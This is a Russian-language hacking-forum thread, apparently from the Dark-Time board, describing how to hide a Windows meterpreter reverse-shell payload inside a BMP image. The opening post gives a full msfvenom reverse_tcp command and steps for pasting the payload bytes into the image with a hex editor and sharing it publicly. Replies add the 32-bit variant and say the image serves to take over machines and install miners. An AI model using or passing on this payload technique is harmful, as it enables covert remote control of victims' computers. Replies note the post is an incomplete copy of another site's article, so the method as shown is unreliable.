Злая КАРТИНКА

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 3K
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Всем привет! сегодня я с Вами по делюсь техникой доставки пэйлода не обычным образом а именно через картинку!
Ибо решил я застолбить эту методику первым на русско-говорящем пространстве и кстати приятно читать свои статьи на ХАК-бордах))) Собсна хочу обратится к копиастерам увожаемые Вы хоть источник указывайте где взяли инструкции, а то люди у вас интересуются по подробностям ну, а Вы в свою очередь их игнорите так-как не знаете всех ньансов моих методик!
Приступим, нам понадобится фотошоп по желанию, программа paint эта утилита есть по умолчанию в винде! И великий и могучий "ДРАКОН" kali-linux в нем и сгенерим наш пэйлоад командой:
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f num > payload.txt





Далее открываем Пайнт в винде и создаем файл .bmp 24-разрядный, размером: длинна 700 высота 2 в пикселях!



переносим его в кали и открываем утилитой hexeditor : hexeditor <name>.bat
копируем наш сгенереный текст в hex-код картинки!





смотрим и видим что наша нагрузка успешно телепортировалась в картинку)) Далее я проявил креатив и позитиу, скрестил его в фотошопе с моей "иконой"






Следущее что я сделал загрузил свою "злую" картинку на какой то сервак)) то есть на общий доступ.

 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Чет я допенькать не могу, н@хуй оно надо то xD
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Уточнение - если вы создаёте payload для x32 системы используйте "windows/meterpreter/reverse_tcp" вместо "windows/x64/meterpreter/reverse_tcp"
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Чет я допенькать не могу, н@хуй оно надо то xD
Зохватит тачку. Заливает meterpreter в корень папки windows, а там можно и майнера закинуть. Это если я всё правильно понял.

Да и вообще, господа, вы странные. Сидите на форуме таком и даже в гугл заглянуть не судьба? Вы наверно даже о kali никогда не слышали и linux только в страшных снах видели? Я за 2 минуты гугления уже примерно понял что это за зверь и что примерно делает.
 
Последнее редактирование:

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
ТС объясни по подробней. Что это даст?Что произойдет при открытие картинки?
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
@SoundX, Малыш,не плачь, я знаю что ты "самый" умный. Я загуглил, понял что это, но смысл от этой картинки не понял
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Статья с сайта codeby. Чел, если ты берёшь статью с другого сайта ты сначала сам её прочитай. Это только первая часть статьи, вторую автор не написал. Так что не нужно такое выкладывать.
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Чет я допенькать не могу, н@хуй оно надо то xD
тоже интересно, что же будет при открытии картинки.
ТС объясни по подробней. Что это даст?Что произойдет при открытие картинки?
Почитал я комменты на codeby, там автор пишет что payload в картинке выполняется с помощью специального скрипта, который предварительно нужно загрузить на сервер.
Потом остаётся только сессию принять.
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Очень злая штука, сейчас будем пробовать!
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
очень интерестная схема
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя